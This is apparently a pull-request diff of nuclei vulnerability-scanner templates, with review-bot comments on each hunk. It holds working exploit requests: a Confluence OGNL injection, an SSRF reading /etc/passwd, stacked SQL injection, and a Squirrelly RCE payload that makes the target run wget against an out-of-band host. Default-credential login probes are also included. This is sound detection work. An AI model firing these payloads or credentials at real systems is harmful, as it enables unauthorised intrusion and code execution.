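Review bot: the description explains how to turn the subscription POST into a GET but never mentions the open redirect the template actually tests (the `redirect=https://example.com` parameter being reflected into `Location`); rewrite it so it states the redirect and the parameter. The query string also repeats `ctrl=frontusers` twice; drop the duplicate. `reference:` is a bare string here while the rest of the PR uses lists, and an NVD link for CVE-2021-24288 could be added at the same time.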

@ -5,6 +5,7 @@ info:
author: johnjhacking
severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss
description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers
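Review bot: typo in the newly added description: "does not property sanitize" should read "does not properly sanitize".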

@ -0,0 +1,47 @@
id: CVE-2021-26084
info:
author: dhiyaneshDk,philippedelteil
severity: critical
name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence
reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
- https://github.com/Udyz/CVE-2021-26084
requests:
- raw:
- |
POST /{{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
payloads:
path:
- pages/createpage-entervariables.action?SpaceKey=x
- confluence/pages/createpage-entervariables.action?SpaceKey=x
- wiki/pages/createpage-entervariables.action?SpaceKey=x
- pages/doenterpagevariables.action
- pages/createpage.action?spaceKey=myproj
- pages/templates2/viewpagetemplate.action
- pages/createpage-entervariables.action
- template/custom/content-editor
- templates/editor-preload-container
- users/user-dark-features
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'value="aaaa{140592=null}'

@ -0,0 +1,33 @@
id: CVE-2021-28918
info:
name: Netmask NPM Package SSRF
author: johnjhacking
severity: critical
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
tags: cve,cve2021,npm,netmask,ssrf,lfi
reference:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
requests:
- method: GET
path:
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Apache Server Status"
- "Server Version"
condition: and
- type: regex
regex:
- "root:.*:0:0:"

@ -0,0 +1,28 @@
id: CVE-2021-31856
info:
name: Layer5 Meshery 0.5.2 SQLi
author: princechaddha
severity: critical
description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
reference:
- https://github.com/ssst0n3/CVE-2021-31856
- https://nvd.nist.gov/vuln/detail/CVE-2021-31856
tags: sqli,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
matchers-condition: and
matchers:
- type: word
words:
- "709b38b27304df6257a86a60df742c4c"
part: body
- type: status
status:
- 200
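Review bot: the description names the `/experimental/patternfiles` endpoint while the request path is `/api/experimental/patternfile` (singular, under `/api`); confirm which route is the vulnerable one and make the two agree. Please also confirm that `709b38b27304df6257a86a60df742c4c` is what the backend's `md5('nuclei')` returns, since a wrong constant makes the template silently never match, and note in the description that the stacked `;select` depends on the database accepting multiple statements in one query.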

View File

@ -0,0 +1,26 @@
id: CVE-2021-32819
info:
name: Nodejs squirrelly template engine RCE
author: pikpikcu
severity: critical
description: |
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
- https://www.linuxlz.com/aqld/2331.html
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
tags: cve,cve2021,nodejs,rce,oob
requests:
- method: GET
path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
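Review bot: the matcher only accepts an `http` interaction, but the payload runs `wget` through `child_process.exec`; on a host without `wget`, or with outbound HTTP filtered, the command executes and nothing is recorded, so the RCE is missed. Matching on `dns` (or on both protocols with `condition: or`) also catches the name lookup that precedes the HTTP request and is more robust. Since this template runs an OS command on the target rather than a benign probe, the description should flag it as intrusive.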

View File

@ -0,0 +1,23 @@
id: CVE-2021-34370
info:
name: Accela Civic Platform 21.1 - Open Redirect & XSS
author: 0x_Akoko
severity: medium
description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
reference:
- https://www.exploit-db.com/exploits/49990
- https://nvd.nist.gov/vuln/detail/CVE-2021-34370
- https://www.accela.com/civic-platform/
tags: xss,redirect,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
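Review bot: the name and tags advertise XSS, but the single request only tests the open redirect (`successURL=https://example.com/` checked against `Location`), so the `xss` tag will mislabel results; either add the XSS probe or drop the tag and the `& XSS` from the name. The `description` is a fragment rather than a sentence; say that `logoutAction.do` redirects to an attacker-controlled `successURL`. `servProvCode=SAFVC` is the tenant code from the exploit-db PoC and other instances may require their own, which is worth a comment next to the path.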

View File

@ -0,0 +1,65 @@
id: cs141-default-login
info:
name: CS141 SNMP Module Default Credentials
author: socketz
severity: medium
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
requests:
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"admin","password":"cs141-snmp"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"guest","password":"guest"}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'accessToken'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- accessToken
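Review bot: `Content-Length: 44` is copied into all three raw requests but only matches the first body; `{"userName":"engineer","password":"engineer"}` is 45 bytes and `{"userName":"guest","password":"guest"}` is 39. Drop the header and let the client compute it, otherwise a server that honours the declared length reads a truncated or over-long body. Also check where the device returns `accessToken`: the word matcher uses `part: header` and the `kval` extractor reads header/cookie pairs, so if the token comes back in the JSON body (as the `application/json` match suggests) both need a body-part regex instead.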

View File

@ -50,7 +50,7 @@ requests:
- password
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,54 @@
id: vidyo-default-credentials
info:
name: Vidyo Default Credentials
author: izn0u
severity: medium
description: test for default cred super:password
reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
tags: vidyo,default-login
requests:
- raw:
- |
GET /super/login.html?lang=en HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{RootURL}}/super/login.html?lang=en
Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
username=super&password=password
extractors:
- type: regex
name: csrf_tkn
group: 1
part: body
internal: true
regex:
- 'csrf_tkn=([A-Za-z0-9.-]+)'
- type: kval
name: session
internal: true
part: header
kval:
- JSESSIONID
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/super/index.html"
- type: status
status:
- 302
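Review bot: the `Cookie` header has a stray space before the separator (`JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en`), which is not valid cookie syntax; remove it. `Origin` is built from `{{BaseURL}}` while `Referer` uses `{{RootURL}}`; `Origin` must be scheme and host only, so use `{{RootURL}}` for both. The `description` (`test for default cred super:password`) should state what a match means, i.e. that `super`/`password` was accepted and the portal redirected to `/super/index.html`.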

View File

@ -0,0 +1,28 @@
id: wso2-management-console-default-password
info:
name: WSO2 Management Console Default Password
author: cocxanh
severity: high
reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
tags: default-login,wso2
requests:
- raw:
- |
POST /carbon/admin/login_action.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 29
username=admin&password=admin
redirects: false
matchers:
- type: word
words:
- "/carbon/admin/index.jsp?loginStatus=true"
- "JSESSIONID"
part: header
condition: and

View File

@ -22,6 +22,7 @@ requests:
- '{{BaseURL}}/sql.php'
- '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -1,11 +1,11 @@
id: cisco-security-details
id: cisco-meraki-exposure
info:
name: Cisco Meraki cloud & Security Appliance details
author: dhiyaneshDK
name: Cisco Meraki cloud & security Appliances Information Disclosure
author: dhiyaneshDK,r3naissance
severity: info
reference: https://www.exploit-db.com/ghdb/6708
tags: panel,cisco
tags: panel,cisco,meraki,disclosure
requests:
- method: GET
@ -17,6 +17,9 @@ requests:
- type: word
words:
- 'Your client connection'
- 'This security appliance is directly connected to a local network'
condition: and
- type: status
status:
- 200

View File

@ -13,7 +13,13 @@ requests:
- '{{BaseURL}}/dbconsole/'
- '{{BaseURL}}/h2-console/'
matchers-condition: and
matchers:
- type: word
words:
- "<title>H2 Console</title>"
- type: word
words:
- "Sorry, remote connections ('webAllowOthers') are disabled on this server"
negative: true

View File

@ -13,6 +13,7 @@ requests:
- "{{BaseURL}}/jira/secure/Dashboard.jspa"
- "{{BaseURL}}/login.jsp"
stop-at-first-match: true
redirects: true
max-redirects: 2
matchers:

View File

@ -22,10 +22,12 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/"
- "{{BaseURL}}/phpMyAdmin/"
stop-at-first-match: true
matchers:
- type: word
words:
- "<title>phpMyAdmin"
- "pmahomme"
extractors:
- type: regex

View File

@ -14,6 +14,8 @@ requests:
- '{{BaseURL}}/zp/zp-core/setup/index.php'
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -14,6 +14,7 @@ requests:
- '{{BaseURL}}/sphider/admin/admin.php'
- '{{BaseURL}}/search/admin/admin.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -51,6 +51,7 @@ requests:
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -17,26 +17,27 @@ requests:
- "{{BaseURL}}/api/application.wadl"
- "{{BaseURL}}/api/v1/application.wadl"
- "{{BaseURL}}/api/v2/application.wadl"
stop-at-first-match: true
matchers:
- name: http-get
type: word
words:
- "This is simplified WADL with user and core resources only"
- "\"http://jersey.java.net/\""
- "http://jersey.java.net"
- "http://wadl.dev.java.net/2009/02"
condition: or
part: body
- method: OPTIONS
path:
- "{{BaseURL}}"
- "{{BaseURL}}/api/v1"
- "{{BaseURL}}/api/v2"
stop-at-first-match: true
matchers:
- name: http-options
type: word
words:
- "This is simplified WADL with user and core resources only"
- "\"http://jersey.java.net/\""
- "http://jersey.java.net"
- "http://wadl.dev.java.net/2009/02"
condition: or
part: body

View File

@ -24,3 +24,7 @@ requests:
words:
- "application/octet-stream"
part: header
- type: dsl
dsl:
- 'len(body) > 2'

View File

@ -19,6 +19,7 @@ requests:
- "{{BaseURL}}/docker-compose-dev.yml"
- "{{BaseURL}}/docker-compose.override.yml"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl

View File

@ -22,8 +22,8 @@ requests:
- '{{BaseURL}}/events../.git/config'
- '{{BaseURL}}/media../.git/config'
- '{{BaseURL}}/lib../.git/config'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/axis2-web/HappyAxis.jsp"
- "{{BaseURL}}/happyaxis.jsp"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -29,6 +29,7 @@ requests:
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)'
- '(?i)(!native)|(.*keybindings)'
- '(?i)(layout|a)key'
- '(?i)token_expires_in'
condition: or
negative: true

View File

@ -25,7 +25,7 @@ requests:
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -18,8 +18,9 @@ requests:
header: helpers/payloads/request-headers.txt
payload: helpers/payloads/command-injection.txt
attack: clusterbomb
redirects: true
redirects: true
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word

View File

@ -22,7 +22,7 @@ requests:
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
matchers-condition: and
matchers:
- type: binary

View File

@ -22,7 +22,7 @@ requests:
passwords: helpers/wordlists/wp-passwords.txt
threads: 50
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/a.htaccess"
- "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess"
stop-at-first-match: true
matchers:
- type: word
words:

View File

@ -1,17 +0,0 @@
id: missing-csp
info:
name: CSP Not Enforced
author: geeknik
severity: info
description: Checks if there is a CSP header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''content-security-policy'')'

View File

@ -1,17 +0,0 @@
id: missing-hsts
info:
name: Strict Transport Security Not Enforced
author: Dawid Czarnecki
severity: info
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''strict-transport-security'')'

View File

@ -1,18 +0,0 @@
id: missing-x-content-type-options
info:
name: X-Content-Type-Options unidentified
author: G4L1T0 and @convisoappsec
severity: info
description: Check for X-Content-Type-Options header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''x-content-type-options'')'

View File

@ -1,19 +0,0 @@
id: missing-x-frame-options
info:
name: Clickjacking (Missing XFO header)
author: kurohost
severity: low
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-frame-options')"
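Review bot: this check was `severity: low` here and becomes `severity: info` in the consolidated `http-missing-security-headers` template, so users filtering on `-severity low` lose the clickjacking finding; if the downgrade is intended, say so in the PR description.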

View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -20,6 +20,7 @@ requests:
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
stop-at-first-match: true
matchers-condition: and
matchers:

View File

@ -66,6 +66,8 @@ requests:
- '{{BaseURL}}///etc.children.json/FNZ.html'
- '{{BaseURL}}///etc.children.json/FNZ.png'
- '{{BaseURL}}///etc.children.json/FNZ.ico'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -13,9 +13,8 @@ requests:
- "{{BaseURL}}/views/ajax/autocomplete/user/a"
- "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a"
- "{{BaseURL}}/?q=views/ajax/autocomplete/user/a"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -13,17 +13,19 @@ requests:
- "{{BaseURL}}/user/1"
- "{{BaseURL}}/user/2"
- "{{BaseURL}}/user/3"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
part: header
- type: status
status:
- 301
extractors:
- type: regex
part: header

View File

@ -0,0 +1,127 @@
id: http-missing-security-headers
info:
name: HTTP Missing Security Headers
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
severity: info
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
tags: misconfig,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: regex
name: strict-transport-security
regex:
- "(?i)strict-transport-security"
negative: true
part: header
- type: regex
name: content-security-policy
regex:
- "(?i)content-security-policy"
negative: true
part: header
- type: regex
name: x-frame-options
regex:
- "(?i)x-frame-options"
negative: true
part: header
- type: regex
name: x-content-type-options
regex:
- "(?i)x-content-type-options"
negative: true
part: header
- type: regex
name: x-permitted-cross-domain-policies
regex:
- "(?i)x-permitted-cross-domain-policies"
negative: true
part: header
- type: regex
name: referrer-policy
regex:
- "(?i)referrer-policy"
negative: true
part: header
- type: regex
name: clear-site-data
regex:
- "(?i)clear-site-data"
negative: true
part: header
- type: regex
name: cross-origin-embedder-policy
regex:
- "(?i)cross-origin-embedder-policy"
negative: true
part: header
- type: regex
name: cross-origin-opener-policy
regex:
- "(?i)cross-origin-opener-policy"
negative: true
part: header
- type: regex
name: cross-origin-resource-policy
regex:
- "(?i)cross-origin-resource-policy"
negative: true
part: header
- type: regex
name: access-control-allow-origin
regex:
- "(?i)access-control-allow-origin"
negative: true
part: header
- type: regex
name: access-control-allow-credentials
regex:
- "(?i)access-control-allow-credentials"
negative: true
part: header
- type: regex
name: access-control-expose-headers
regex:
- "(?i)access-control-expose-headers"
negative: true
part: header
- type: regex
name: access-control-max-age
regex:
- "(?i)access-control-max-age"
negative: true
part: header
- type: regex
name: access-control-allow-methods
regex:
- "(?i)access-control-allow-methods"
negative: true
part: header
- type: regex
name: access-control-allow-headers
regex:
- "(?i)access-control-allow-headers"
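Review bot: with `matchers-condition: or` and every matcher negative, the template reports any response missing any one of these headers, and several of them are not expected on an ordinary page: the six `access-control-*` headers are CORS relaxations whose absence is the safe default, and `clear-site-data` belongs on logout responses only. Flagging their absence inverts the check and will fire on almost every target; keep the list to headers whose absence weakens a default response (`strict-transport-security`, `content-security-policy`, `x-frame-options`, `x-content-type-options`, `referrer-policy`, the three `cross-origin-*` policies). `strict-transport-security` is only honoured over HTTPS, so on `http://` targets its absence is expected and should not be reported. The `description` should also be reworded into a plain statement of what is checked.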

View File

@ -0,0 +1,29 @@
id: kubernetes-metrics
info:
name: Detect Kubernetes Exposed Metrics
author: pussycat0x
severity: low
description: Information Disclosure of Garbage Collection
tags: kubernetes,exposure,devops
reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- "namespace"
- "HELP"
- "TYPE"
- "kube"
- type: status
status:
- 200
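Review bot: `description: Information Disclosure of Garbage Collection` (also used in `node-exporter-metrics`) does not describe this check; what `/metrics` exposes here is Prometheus-format cluster metrics. `HELP` and `TYPE` appear on every Prometheus exposition, so only `namespace` and `kube` discriminate; a kube-specific metric name would avoid matching any exporter that happens to carry a `namespace` label.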

View File

@ -13,16 +13,18 @@ requests:
path:
- '{{BaseURL}}/pods'
- '{{BaseURL}}/api/v1/pods'
matchers-condition: and
matchers:
- type: word
words:
- "apiVersion"
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: kubernetes-resource-report
info:
name: Detect Overview Kubernetes Resource Report
author: pussycat0x
severity: medium
description: Information Disclosure of Kubernetes Resource Report
tags: kubernetes,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Overview - Kubernetes Resource Report"
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: node-exporter-metrics
info:
name: Detect Node Exporter Metrics
author: pussycat0x
severity: low
description: Information Disclosure of Garbage Collection
tags: node,exposure,debug
requests:
- method: GET
path:
- "{{BaseURL}}/metrics"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "node_cooling_device"
- "node_network"
condition: and
- type: status
status:
- 200
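Review bot: the description is copied from the Kubernetes template and does not fit Node Exporter. `node_cooling_device` comes from the thermal collector and is only emitted on hosts that expose cooling devices, so requiring it with `condition: and` will miss exporters on many VMs and containers; `node_exporter_build_info` is present on every instance and is a more portable discriminator alongside `node_network`.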

View File

@ -2,31 +2,39 @@ id: php_errors
info:
name: PHP errors
author: w4cky_
author: w4cky_,geeknik
severity: info
tags: debug
tags: debug,php
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Fatal error"
- "Call to undefined method"
- "You have an error in your SQL syntax;"
- "MySQL server version for the right syntax to use near"
- "PHP Warning"
- "PHP Error"
- "Warning: mysql_connect():"
- "Warning: mysql_query()"
- "Warning: pg_connect():"
- "failed to open stream: HTTP request failed"
- "SAFE MODE Restriction in effect."
- "Cannot modify header information"
- "ORA-00921: unexpected end of SQL command"
- "ORA-00933: SQL command not properly ended"
- "ORA-00936: missing expression"
- "ORA-12541: TNS:no listener"
extractors:
- type: regex
regex:
- '(?i)Fatal error'
- '(?i)Call to undefined method'
- '(?i)You have an error in your SQL syntax'
- '(?i)MySQL server version for the right syntax to use near'
- '(?i)MySQL cannot create a temporary file'
- '(?i)PHP (Warning|Error)'
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
- '(?i)failed to open stream\:'
- '(?i)SAFE MODE Restriction in effect'
- '(?i)Cannot modify header information'
- '(?i)ORA-00921\: unexpected end of SQL command'
- '(?i)ORA-00933\: SQL command not properly ended'
- '(?i)ORA-00936\: missing expression'
- '(?i)ORA-12541\: TNS\:no listener'
- '(?i)uncaught exception'
- '(?i)include_path'
- '(?i)undefined index'
- '(?i)undefined variable\:'
- '(?i)stack trace\:'
- '(?i)expects parameter [0-9]*'
- '(?i)Debug Trace'
- '(?i)(syntax|parse) error'
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
- '(?i)Maximum execution time of \d* seconds exceeded'
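Review bot: several of the new extractor regexes are bare words that occur in ordinary content, not just in PHP error output: `(?i)include_path`, `(?i)undefined index`, `(?i)stack trace\:`, `(?i)Debug Trace` and `(?i)(syntax|parse) error` will fire on documentation, code-hosting pages and any page that discusses PHP. With the `matchers` block removed, the template now reports on any extraction, so these translate directly into false positives; anchor them to PHP's error format, e.g. require a `Warning:`/`Notice:`/`Fatal error:` prefix or the trailing ` in <file> on line <n>`.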

View File

@ -1,8 +1,8 @@
id: unauthenticated-mongo-express.yaml
id: unauthenticated-mongo-express
info:
name: Mongo Express Unauthenticated
author: dhiyaneshDK
author: dhiyaneshDK,b0rn2r00t
severity: high
reference: https://www.exploit-db.com/ghdb/5684
tags: mongo,unauth
@ -12,12 +12,15 @@ requests:
path:
- '{{BaseURL}}'
- '{{BaseURL}}/mongo-express/'
- '{{BaseURL}}/db/admin/system.users'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Home - Mongo Express</title>'
- '<title>system.users - Mongo Express</title>'
condition: or
- type: status
status:
- 200

View File

@ -0,0 +1,25 @@
id: abyss-web-server
info:
name: Detect Abyss Web Server
author: pussycat0x
severity: info
tags: tech
additional-fields:
fofa-dork: 'app="Abyss-Web-Server"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Welcome to Abyss Web Server"
- type: status
status:
- 200

View File

@ -0,0 +1,62 @@
id: adobe-coldfusion-detector
info:
name: Adobe ColdFusion Detector
author: philippedelteil
severity: info
description: With this template we can detect the version number of Coldfusion instances based on their logos.
tags: adobe,coldfusion
requests:
- method: GET
path:
- "{{BaseURL}}/CFIDE/administrator/images/mx_login.gif"
- "{{BaseURL}}/cfide/administrator/images/mx_login.gif"
- "{{BaseURL}}/CFIDE/administrator/images/background.jpg"
- "{{BaseURL}}/cfide/administrator/images/background.jpg"
- "{{BaseURL}}/CFIDE/administrator/images/componentutilslogin.jpg"
- "{{BaseURL}}/cfide/administrator/images/componentutilslogin.jpg"
redirects: true
stop-at-first-match: true
max-redirects: 2
matchers:
- type: dsl
name: "coldfusion-8"
dsl:
- "status_code==200 && (\"da07693b70ddbac5bc0d8bf98d4a3539\" == md5(body))"
- type: dsl
name: "coldfusion-9"
dsl:
- "status_code==200 && (\"c0757351b00f7ecf35a035c976068d12\" == md5(body))"
- type: dsl
name: "coldfusion-10"
dsl:
- "status_code==200 && (\"a4c81b7a6289b2fc9b36848fa0cae83c\" == md5(body))"
- type: dsl
name: "coldfusion-11"
dsl:
- "status_code==200 && (\"7f024de9f480481ca03049e0d66679d6\" == md5(body))"
- type: dsl
name: "coldfusion-2016"
dsl:
- "status_code==200 && (\"f1281b6866aef66e35dc36fe4f0bf990\" == md5(body))"
- type: dsl
name: "coldfusion-2021"
dsl:
- "status_code==200 && (\"a88530d7f1980412dac076de732a4e86\" == md5(body))"
- type: dsl
name: "coldfusion-2018"
dsl:
- "status_code==200 && (\"92ef6ee3c4d1700e3cca797b19d3e7ba\" == md5(body))"
- type: dsl
name: "coldfusion-mx-7"
dsl:
- "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))"
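Review bot: each `dsl` matcher compares `md5(body)` to a constant, but the request list fetches three different files (`mx_login.gif`, `background.jpg`, `componentutilslogin.jpg`) under two path spellings, so each hash identifies one specific file of one version and the matcher name does not say which; record the source file next to each hash so the constants can be re-derived when a release changes an image. The matchers are also out of version order (`coldfusion-2021` sits between `2016` and `2018`, `coldfusion-mx-7` is last), which makes the list harder to maintain.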

View File

@ -14,6 +14,7 @@ requests:
- "{{BaseURL}}/axis2/"
- "{{BaseURL}}/axis/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -0,0 +1,28 @@
id: craft-cms-detect
info:
name: Craft CMS Detect
author: skeltavik
severity: info
description: Detects Craft CMS
reference: https://craftcms.com
tags: tech,craftcms
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'X-Powered-By: Craft CMS'
- type: regex
part: header
regex:
- 'Set-Cookie: (Craft|CRAFT)'

View File

@ -52,6 +52,7 @@ requests:
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,25 @@
id: kubernetes-enterprise-manager
info:
name: Detect Kubernetes Enterprise Manager
author: pussycat0x
severity: info
tags: tech,kubernetes
additional-fields:
